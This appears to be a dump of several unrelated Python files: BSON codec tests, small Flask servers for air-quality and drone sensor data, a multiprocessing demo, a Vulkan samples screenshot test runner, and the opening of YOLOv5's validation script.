self.assertNotEqual(re1, re2)
re1 = Regex('a', re.I)
re2 = Regex('a', re.I)
self.assertEqual(re1, re2)
def test_exception_wrapping(self):
# No matter what exception is raised while trying to decode BSON,
# the final exception always matches InvalidBSON.
# {'s': '\xff'}, will throw attempting to decode utf-8.
bad_doc = b'\x0f\x00\x00\x00\x02s\x00\x03\x00\x00\x00\xff\x00\x00\x00'
with self.assertRaises(InvalidBSON) as context:
decode_all(bad_doc)
self.assertIn("codec can't decode byte 0xff",
str(context.exception))
def test_minkey_maxkey_comparison(self):
# MinKey's <, <=, >, >=, !=, and ==.
self.assertTrue(MinKey() < None)
self.assertTrue(MinKey() < 1)
self.assertTrue(MinKey() <= 1)
self.assertTrue(MinKey() <= MinKey())
self.assertFalse(MinKey() > None)
self.assertFalse(MinKey() > 1)
self.assertFalse(MinKey() >= 1)
self.assertTrue(MinKey() >= MinKey())
self.assertTrue(MinKey() != 1)
self.assertFalse(MinKey() == 1)
self.assertTrue(MinKey() == MinKey())
# MinKey compared to MaxKey.
self.assertTrue(MinKey() < MaxKey())
self.assertTrue(MinKey() <= MaxKey())
self.assertFalse(MinKey() > MaxKey())
self.assertFalse(MinKey() >= MaxKey())
self.assertTrue(MinKey() != MaxKey())
self.assertFalse(MinKey() == MaxKey())
# MaxKey's <, <=, >, >=, !=, and ==.
self.assertFalse(MaxKey() < None)
self.assertFalse(MaxKey() < 1)
self.assertFalse(MaxKey() <= 1)
self.assertTrue(MaxKey() <= MaxKey())
self.assertTrue(MaxKey() > None)
self.assertTrue(MaxKey() > 1)
self.assertTrue(MaxKey() >= 1)
self.assertTrue(MaxKey() >= MaxKey())
self.assertTrue(MaxKey() != 1)
self.assertFalse(MaxKey() == 1)
self.assertTrue(MaxKey() == MaxKey())
# MaxKey compared to MinKey.
self.assertFalse(MaxKey() < MinKey())
self.assertFalse(MaxKey() <= MinKey())
self.assertTrue(MaxKey() > MinKey())
self.assertTrue(MaxKey() >= MinKey())
self.assertTrue(MaxKey() != MinKey())
self.assertFalse(MaxKey() == MinKey())
def test_minkey_maxkey_hash(self):
self.assertEqual(hash(MaxKey()), hash(MaxKey()))
self.assertEqual(hash(MinKey()), hash(MinKey()))
self.assertNotEqual(hash(MaxKey()), hash(MinKey()))
def test_timestamp_comparison(self):
# Timestamp is initialized with time, inc. Time is the more
# significant comparand.
self.assertTrue(Timestamp(1, 0) < Timestamp(2, 17))
self.assertTrue(Timestamp(2, 0) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 7) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(2, 0) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(2, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(2, 0))
# Comparison by inc.
self.assertTrue(Timestamp(1, 0) < Timestamp(1, 1))
self.assertTrue(Timestamp(1, 1) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 1))
self.assertFalse(Timestamp(1, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(1, 0) >= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 1) >= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 1) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(1, 0))
def test_timestamp_highorder_bits(self):
doc = {'a': Timestamp(0xFFFFFFFF, 0xFFFFFFFF)}
doc_bson = (b'\x10\x00\x00\x00'
b'\x11a\x00\xff\xff\xff\xff\xff\xff\xff\xff'
b'\x00')
self.assertEqual(doc_bson, encode(doc))
self.assertEqual(doc, decode(doc_bson))
def test_bad_id_keys(self):
self.assertRaises(InvalidDocument, encode,
{"_id": {"$bad": 123}}, True)
self.assertRaises(InvalidDocument, encode,
{"_id": {'$oid': "52d0b971b3ba219fdeb4170e"}}, True)
encode({"_id": {'$oid': "52d0b971b3ba219fdeb4170e"}})
def test_bson_encode_thread_safe(self):
def target(i):
for j in range(1000):
my_int = type('MyInt_%s_%s' % (i, j), (int,), {})
bson.encode({'my_int': my_int()})
threads = [ExceptionCatchingThread(target=target, args=(i,))
for i in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
self.assertIsNone(t.exc)
def test_raise_invalid_document(self):
class Wrapper(object):
def __init__(self, val):
self.val = val
def __repr__(self):
return repr(self.val)
self.assertEqual('1', repr(Wrapper(1)))
with self.assertRaisesRegex(
InvalidDocument,
"cannot encode object: 1, of type: " + repr(Wrapper)):
encode({'t': Wrapper(1)})
class TestCodecOptions(unittest.TestCase):
def test_document_class(self):
self.assertRaises(TypeError, CodecOptions, document_class=object)
self.assertIs(SON, CodecOptions(document_class=SON).document_class)
def test_tz_aware(self):
self.assertRaises(TypeError, CodecOptions, tz_aware=1)
self.assertFalse(CodecOptions().tz_aware)
self.assertTrue(CodecOptions(tz_aware=True).tz_aware)
def test_uuid_representation(self):
self.assertRaises(ValueError, CodecOptions, uuid_representation=7)
self.assertRaises(ValueError, CodecOptions, uuid_representation=2)
def test_tzinfo(self):
self.assertRaises(TypeError, CodecOptions, tzinfo='pacific')
tz = FixedOffset(42, 'forty-two')
self.assertRaises(ValueError, CodecOptions, tzinfo=tz)
self.assertEqual(tz, CodecOptions(tz_aware=True, tzinfo=tz).tzinfo)
def test_codec_options_repr(self):
r = ("CodecOptions(document_class=dict, tz_aware=False, "
"uuid_representation=UuidRepresentation.UNSPECIFIED, "
"unicode_decode_error_handler='strict', "
"tzinfo=None, type_registry=TypeRegistry(type_codecs=[], "
"fallback_encoder=None))")
self.assertEqual(r, repr(CodecOptions()))
def test_decode_all_defaults(self):
# Test decode_all()'s default document_class is dict and tz_aware is
# False.
doc = {'sub_document': {},
'dt': datetime.datetime.utcnow()}
decoded = bson.decode_all(bson.encode(doc))[0]
self.assertIsInstance(decoded['sub_document'], dict)
self.assertIsNone(decoded['dt'].tzinfo)
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, 'cannot encode native uuid'):
bson.decode_all(bson.encode({'uuid': uuid.uuid4()}))
def test_unicode_decode_error_handler(self):
enc = encode({"keystr": "foobar"})
# Test handling of bad key value, bad string value, and both.
invalid_key = enc[:7] + b'\xe9' + enc[8:]
invalid_val = enc[:18] + b'\xe9' + enc[19:]
invalid_both = enc[:7] + b'\xe9' + enc[8:18] + b'\xe9' + enc[19:]
# Ensure that strict mode raises an error.
for invalid in [invalid_key, invalid_val, invalid_both]:
self.assertRaises(InvalidBSON, decode, invalid, CodecOptions(
unicode_decode_error_handler="strict"))
self.assertRaises(InvalidBSON, decode, invalid, CodecOptions())
self.assertRaises(InvalidBSON, decode, invalid)
# Test all other error handlers.
for handler in ['replace', 'backslashreplace', 'surrogateescape',
'ignore']:
expected_key = b'ke\xe9str'.decode('utf-8', handler)
expected_val = b'fo\xe9bar'.decode('utf-8', handler)
doc = decode(invalid_key,
CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: "foobar"})
doc = decode(invalid_val,
CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {"keystr": expected_val})
doc = decode(invalid_both,
CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: expected_val})
# Test handling bad error mode.
dec = decode(enc,
CodecOptions(unicode_decode_error_handler="junk"))
self.assertEqual(dec, {"keystr": "foobar"})
self.assertRaises(InvalidBSON, decode, invalid_both, CodecOptions(
unicode_decode_error_handler="junk"))
def round_trip_pickle(self, obj, pickled_with_older):
pickled_with_older_obj = pickle.loads(pickled_with_older)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
pkl = pickle.dumps(obj, protocol=protocol)
obj2 = pickle.loads(pkl)
self.assertEqual(obj, obj2)
self.assertEqual(pickled_with_older_obj, obj2)
def test_regex_pickling(self):
reg = Regex(".?")
pickled_with_3 = (b'\x80\x04\x959\x00\x00\x00\x00\x00\x00\x00\x8c\n'
b'bson.regex\x94\x8c\x05Regex\x94\x93\x94)\x81\x94}'
b'\x94(\x8c\x07pattern\x94\x8c\x02.?\x94\x8c\x05flag'
b's\x94K\x00ub.')
self.round_trip_pickle(reg, pickled_with_3)
def test_timestamp_pickling(self):
ts = Timestamp(0, 1)
pickled_with_3 = (b'\x80\x04\x95Q\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\x0ebson.timestamp\x94\x8c\tTimestamp\x94\x93\x94)'
b'\x81\x94}\x94('
b'\x8c\x10_Timestamp__time\x94K\x00\x8c'
b'\x0f_Timestamp__inc\x94K\x01ub.')
self.round_trip_pickle(ts, pickled_with_3)
def test_dbref_pickling(self):
dbr = DBRef("foo", 5)
pickled_with_3 = (b'\x80\x04\x95q\x00\x00\x00\x00\x00\x00\x00\x8c\n'
b'bson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}'
b'\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94'
b'\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database'
b'\x94N\x8c\x0e_DBRef__kwargs\x94}\x94ub.')
self.round_trip_pickle(dbr, pickled_with_3)
dbr = DBRef("foo", 5, database='db', kwargs1=None)
pickled_with_3 = (b'\x80\x04\x95\x81\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\nbson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}'
b'\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94'
b'\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database'
b'\x94\x8c\x02db\x94\x8c\x0e_DBRef__kwargs\x94}\x94'
b'\x8c\x07kwargs1\x94Nsub.')
self.round_trip_pickle(dbr, pickled_with_3)
def test_minkey_pickling(self):
mink = MinKey()
pickled_with_3 = (b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\x0cbson.min_key\x94\x8c\x06MinKey\x94\x93\x94)'
b'\x81\x94.')
self.round_trip_pickle(mink, pickled_with_3)
def test_maxkey_pickling(self):
maxk = MaxKey()
pickled_with_3 = (b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c'
b'\x0cbson.max_key\x94\x8c\x06MaxKey\x94\x93\x94)'
b'\x81\x94.')
self.round_trip_pickle(maxk, pickled_with_3)
def test_int64_pickling(self):
i64 = Int64(9)
pickled_with_3 = (b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c\n'
b'bson.int64\x94\x8c\x05Int64\x94\x93\x94K\t\x85\x94'
b'\x81\x94.')
self.round_trip_pickle(i64, pickled_with_3)
if __name__ == "__main__":
unittest.main()
|
prueba.py
|
from flask import Flask, g, render_template, make_response, request, redirect, url_for, jsonify
from flask_socketio import SocketIO, send, emit
from threading import Thread
import rethinkdb as r
from rethinkdb import RqlRuntimeError
app = Flask(__name__)
socketio = SocketIO(app)
global thread
thread = None
# Load default config and override config from an environment variable
app.config.update(dict(
DEBUG=True,
SECRET_KEY='secret!',
DB_HOST='localhost',
DB_PORT=28015,
DB_NAME='calidad_aire'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def init_db():
conn = r.connect(app.config['DB_HOST'], app.config['DB_PORT'])
try:
r.db_create(app.config['DB_NAME']).run(conn)
r.db(app.config['DB_NAME']).table_create('datos').run(conn)
r.db(app.config['DB_NAME']).table('datos').index_create('timestamp').run(conn)
print 'Database setup completed. Now run the app without --setup.'
except RqlRuntimeError:
print 'App database already exists. Run the app without --setup.'
finally:
conn.close()
@app.before_request
def before_request():
try:
g.db_conn = r.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
except RqlDriverError:
abort(503, "No database connection could be established.")
@app.teardown_request
def teardown_request(exception):
try:
g.db_conn.close()
except AttributeError:
pass
@app.route('/', methods=['GET'])
def show_info():
datos = list(r.db('calidad_aire').table('datos').order_by(index=r.desc('timestamp')).run(g.db_conn, time_format="raw"))
print(datos)
return render_template('index.html', datos=datos)
def cambios_datos():
conn = r.connect(host=app.config['DB_HOST'],
port=app.config['DB_PORT'],
db=app.config['DB_NAME'])
estaciones = r.table("datos").changes().run(conn)
for chat in estaciones:
chat['new_val']['estacion'] = str(chat['new_val']['estacion'])
socketio.emit('nuevo_dato')
if __name__ == "__main__":
# init_db()
# Set up rethinkdb changefeeds before starting server
if thread is None:
thread = Thread(target=cambios_datos)
thread.start()
socketio.run(app, host='0.0.0.0', port=8081)
|
process_1_简单实现.py
|
#!/usr/bin/env python3
# file: thread_demo_1.py
# Created by Guang at 19-7-15
# description:
# *-* coding:utf8 *-*
import multiprocessing
import time
def func1():
for i in range(5):
print("这是一个进程测试函数func1")
time.sleep(1)
def func2():
for i in range(5):
print("这是一个进程测试函数func2")
time.sleep(1)
if __name__ == '__main__':
print("-------主进程执行开始:{}-----------------".format(time.ctime()))
t1 = multiprocessing.Process(target=func1)
t2 = multiprocessing.Process(target=func2)
t1.start() #启动线程,即让线程开始执行
t2.start()
time.sleep(5)
print("-------主线程执行结束:{}-----------------".format(time.ctime()))
########################################################
"""
笔记:
1.使用多线程并发的操作,花费时间要短很多
2.当调用start()时,才会真正的创建线程,并且开始执行
3.主线程会等待所有的子线程结束后才结束
"""
|
system_test.py
|
'''
Copyright (c) 2019, Arm Limited and Contributors
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys, os, math, platform, threading, datetime, subprocess, zipfile, argparse, shutil, struct, imghdr
from time import sleep
from threading import Thread
# Settings (changing these may cause instabilities)
dependencies = ("magick", "cmake", "git", "adb")
multithread = False
sub_tests = []
test_desktop = True
test_android = True
comparison_metric = "MAE"
current_dir = os.getcwd()
script_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.join(script_path, "../../")
build_path = ""
build_config = ""
outputs_path = "output/images/"
tmp_path = os.path.join(script_path, "tmp/")
archive_path = os.path.join(script_path, "artifacts/")
image_ext = ".png"
android_timeout = 60 # How long in seconds should we wait before timing out on Android
check_step = 5
threshold = 0.999 # How similar the images are allowed to be before they pass
class Subtest:
result = False
test_name = ""
platform = ""
def __init__(self, test_name, platform):
self.test_name = test_name
self.platform = platform
def run(self, application_path):
result = True
path = root_path + application_path
arguments = ["--test", "{}".format(self.test_name), "--headless"]
try:
subprocess.run([path] + arguments, cwd=root_path)
except FileNotFoundError:
print("\t\t\t(Error) Couldn't find application ({})".format(path))
result = False
except:
print("\t\t\t(Error) Application error ({})".format(path))
result = False
return result
def test(self):
print("\t\t=== Test started: {} ===".format(self.test_name))
self.result = True
screenshot_path = tmp_path + self.platform + "/"
try:
shutil.move(os.path.join(root_path, outputs_path) + self.test_name + image_ext, screenshot_path + self.test_name + image_ext)
except FileNotFoundError:
print("\t\t\t(Error) Couldn't find screenshot ({}), perhaps test crashed".format(os.path.join(root_path, outputs_path) + self.test_name + image_ext))
self.result = False
return
if not test(self.test_name, screenshot_path):
self.result = False
if self.result:
print("\t\t=== Passed! ===")
else:
print("\t\t=== Failed. ===")
def passed(self):
return self.result
class WindowsSubtest(Subtest):
def __init__(self, test_name):
super().__init__(test_name, "Windows")
def run(self):
app_path = "{}app/bin/{}/{}/vulkan_samples.exe".format(build_path, build_config, platform.machine())
return super().run(app_path)
class UnixSubtest(Subtest):
def __init__(self, test_name, platform_type):
super().__init__(test_name, platform_type)
def run(self):
app_path = "{}app/bin/{}/{}/vulkan_samples".format(build_path, build_config, platform.machine())
return super().run(app_path)
class AndroidSubtest(Subtest):
def __init__(self, test_name):
super().__init__(test_name, "Android")
def run(self):
subprocess.run("adb shell am force-stop com.khronos.vulkan_samples")
subprocess.run(["adb", "shell", "am", "start", "-W", "-n", "com.khronos.vulkan_samples/com.khronos.vulkan_samples.SampleLauncherActivity", "-e", "test", "{0}".format(self.test_name)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
output = subprocess.check_output("adb shell dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1")
activity = "".join(output.decode("utf-8").split())
timeout_counter = 0
while activity == "vulkan_samples" and timeout_counter <= android_timeout:
sleep(check_step)
timeout_counter += check_step
output = subprocess.check_output("adb shell \"dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1\"")
activity = "".join(output.decode("utf-8").split())
if timeout_counter <= android_timeout:
subprocess.run(["adb", "pull", "/sdcard/Android/data/com.khronos.vulkan_samples/files/" + outputs_path + self.test_name + image_ext, os.path.join(root_path, outputs_path)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
return True
else:
print("\t\t\t(Error) Timed out")
return False
def create_app(platform, test_name):
"""
@brief Creates a buildable and runnable test, returning it
@param platform An integer representing what platform the app should be built for
@param test_name The name of the test, used to create the app
@return A runnable application
"""
if platform == "Windows":
return WindowsSubtest(test_name)
elif platform in ["Linux", "Darwin"]:
return UnixSubtest(test_name, platform)
elif platform == "Android":
return AndroidSubtest(test_name)
else:
print("Error: cannot create subtest, cant find associated platform.")
exit(1)
def get_command(command):
"""
@brief Ensures command can be executed on each platform
@param command The commands name
@return A platform appropriate command
"""
if platform.system() == "Windows":
command += ".exe"
return command
def get_resolution(image):
"""
@brief Gets the width and height of a given image
@param image The path to the image relative to this script
@return A string denoting the resolution in the format (WxH)
"""
return subprocess.check_output([get_command("magick"), "identify", "-format", "\"%[fx:w]x%[fx:h]\"", image]).decode("utf-8")[1:-1]
def compare(metric, base_image, test_image, diff_image = "null:"):
"""
@brief Compares two images by their mean absolute error (changing the order of these parameters will change the contents of diff_image)
@param metric The type of image comparison you want to invoke
@param base_image The relative path to the image to base the test on
@param test_image The relative path to compare the base_image with
@param diff_image The relative path to the output image of the difference between the two images, default "null:"
@return A float clamped between 0 and 1 denoting how similar the images are (1 being identical, 0 being opposite)
"""
output = ""
try:
output = subprocess.check_output([get_command("magick"), "compare", "-metric", metric, base_image, test_image, diff_image], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
pass
output = output.decode("utf-8")
return max(0.0, min(1.0 - float(output[output.find("(")+1:output.find(")")]), 1.0))
def test(test_name, screenshot_path):
"""
@brief Tests each screenshot within the tmp/ folder against the goldtest, saving the results if it fails
@param test_name The name of the test, used to retrieve the respective goldtest image
@param screenshot_path The directory where to store screenshots
@return True if the image tests pass
"""
# Run test
result = False
image = test_name + image_ext
base_image = screenshot_path + image
test_image = root_path + "assets/gold/{0}/{1}.png".format(test_name, get_resolution(base_image))
if not os.path.isfile(test_image):
print("\t\t\t(Error) Resolution not supported, gold image not found ({})".format(test_image))
return False
diff_image = "{0}{1}-diff.png".format(screenshot_path, image[0:image.find(".")])
print("\t\t\t(Comparing images...) '{0}' with '{1}':".format(base_image, test_image), end = " ", flush = True)
similarity = compare(comparison_metric, base_image, test_image, diff_image)
print("{}%".format(100*math.floor(similarity*10000)/10000))
# Remove images if it is identical
if similarity >= threshold:
os.remove(base_image)
os.remove(diff_image)
result = True
return result
def execute(app):
print("\t=== Running {} on {} ===".format(app.test_name, app.platform))
if app.run():
app.test()
def main():
"""
@brief Runs the system test
"""
if test_android and not os.path.exists(tmp_path + "Android/"):
os.makedirs(tmp_path + "Android/")
if test_desktop and not os.path.exists(tmp_path + platform.system()):
os.makedirs(tmp_path + platform.system())
print("=== System Test started! ===")
results = []
# Create tests
apps = []
for test_name in sub_tests:
if test_android:
apps.append(create_app("Android", test_name))
if test_desktop:
apps.append(create_app(platform.system(), test_name))
# Run tests
if not multithread:
for app in apps:
if app:
execute(app)
else:
threads = []
for app in apps:
process = Thread(target=execute, args=[app])
process.start()
threads.append(process)
for thread in threads:
thread.join()
# Evaluate system test
passed = 0
failed = 0
for app in apps:
results.append(app.passed())
for result in results:
if result:
passed += 1
else:
failed += 1
if failed == 0:
print("=== Success: All tests passed! ===")
shutil.rmtree(tmp_path)
exit(0)
else:
print("=== Failed: {} passed - {} failed ===".format(passed, failed))
# If the screenshot directory is not empty, create an archive of the results
if os.listdir(tmp_path) is not None:
print("=== Archiving results into '{}' ===".format(shutil.make_archive(archive_path + "system_test" + "-" + datetime.datetime.now().strftime("%Y.%m.%d-%H.%M.%S"), 'zip', tmp_path)))
shutil.rmtree(tmp_path)
exit(1)
if __name__ == "__main__":
argparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A simple script that runs, screenshots, and tests your apps against a pre-existing gold")
argparser.add_argument("-B", "--build", required=True, help="relative path to the cmake build directory")
argparser.add_argument("-C", "--config", required=True, help="build configuration to use")
argparser.add_argument("-S", "--subtests", default=os.listdir(os.path.join(script_path, "sub_tests")), nargs="+", help="if set the specified sub tests will be run instead")
argparser.add_argument("-P", "--parallel", action='store_true', help="flag to deploy tests in parallel")
build_group = argparser.add_mutually_exclusive_group()
build_group.add_argument("-D", "--desktop", action='store_false', help="flag to only deploy tests on desktop")
build_group.add_argument("-A", "--android", action='store_false', help="flag to only deploy tests on android")
args = vars(argparser.parse_args())
build_path = args["build"]
build_config = args["config"]
sub_tests = args["subtests"]
test_desktop = args["android"]
test_android = args["desktop"]
multithread = args["parallel"]
if build_path[-1] != "/":
build_path += "/"
# Ensure right dependencies are installed before continuing
runnable = True
for dependency in dependencies:
if shutil.which(dependency) is None:
print("Error: Couldn't find {}, perhaps it is not installed".format(dependency))
runnable = False
if not runnable:
if platform.system() not in ["Linux", "Darwin"]:
exit(1)
else:
print("Unix based system detected. Allowing script to continue to account for aliasing. Please ensure you have the dependencies installed or aliased otherwise the script will fail.")
# If building for android check that a valid device is plugged in
if test_android:
try:
subprocess.check_output("adb get-state")
except:
print("Device not found, disabling Android testing")
test_android = False
else:
print("Device found!")
if multithread:
print("Android doesn't support multithreading, disabling!")
multithread = False
# Run script and handle keyboard interruption
try:
main()
except KeyboardInterrupt:
print("System Test Aborted")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
serverLocal.py
|
from flask import Flask, render_template
from pymavlink import mavutil
from msgdef import *
import socket
import os
import threading
HOST = '127.0.0.1' #Server IP address
PORT = 65432 #Server port
firstTime = True #Indicates whether its the first time to call my_server()
data_view = """""" #Store data to view on webpage
bufferSize = 512
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/init')
def init():
server()
@app.route('/data')
def data():
return f"""<html><head><META HTTP-EQUIV="refresh"
CONTENT="1"></head><body>"""+ data_view +'</body></html>'
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
def server():
global data_view
global firstTime
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a UDP socket
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #Allow socket to reuse port
s.bind((HOST, PORT)) #Bind socket to port
sensorConnection = mavutil.mavlink_connection('udpin:localhost:14540') #Create a MAVLink connection to receive sensor data
if firstTime:
# Indicating the server has started
print("Server Started waiting for clients to connect ")
firstTime = False
receiveDataAndSendActuatorSignal(sensorConnection, s)
def receiveDataAndSendActuatorSignal(mavlink, socket):
global data_view
with socket:
while True:
try:
data, addr = socket.recvfrom(bufferSize) #Receive UDP client port
except:
data = b''
if len(data) != 0: #Checks if UDP client is connected
imu_msg = mavlink.recv_match(type='HIGHRES_IMU', blocking=True, timeout = 0.001) #Receive sensor data through MAVLink
if imu_msg == None:
continue #Restart loop if no data is received
print(imu_msg)
actuatorSignal = imu_msg.xacc * 1.5 #Generate some actuator signal
encodedData = str(actuatorSignal).encode('utf-8') # Encoding the signal
socket.sendto(encodedData, addr) # Send the byte stream to client
data_view = f'''<p>Actuator Signal: {actuatorSignal}<br/> X Acceleration: {imu_msg.xacc}<br/>
Y Acceleration: {imu_msg.yacc}<br/> Z Acceleration: {imu_msg.zacc}<br/>
X Gyro: {imu_msg.xgyro}<br/> Y Gyro: {imu_msg.ygyro}<br/>
Z Gyro: {imu_msg.zgyro}<br/></p>''' + data_view
def url():
os.system('cmd /k "lt --port 5000"')
if __name__ == '__main__':
threading.Thread(target=url).start() #Start local tunnel
app.run(debug=True, host='0.0.0.0') #Build the Flask app
|
val.py
|
"""Validate a trained YOLOv5 model accuracy on a custom datasets
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_sync
from utils.callbacks import Callbacks
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class datasets
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project='runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
data = check_dataset(data) # check
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = type(data['val']) is str and data['val'].endswith('coco/val2017.txt') # COCO datasets
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
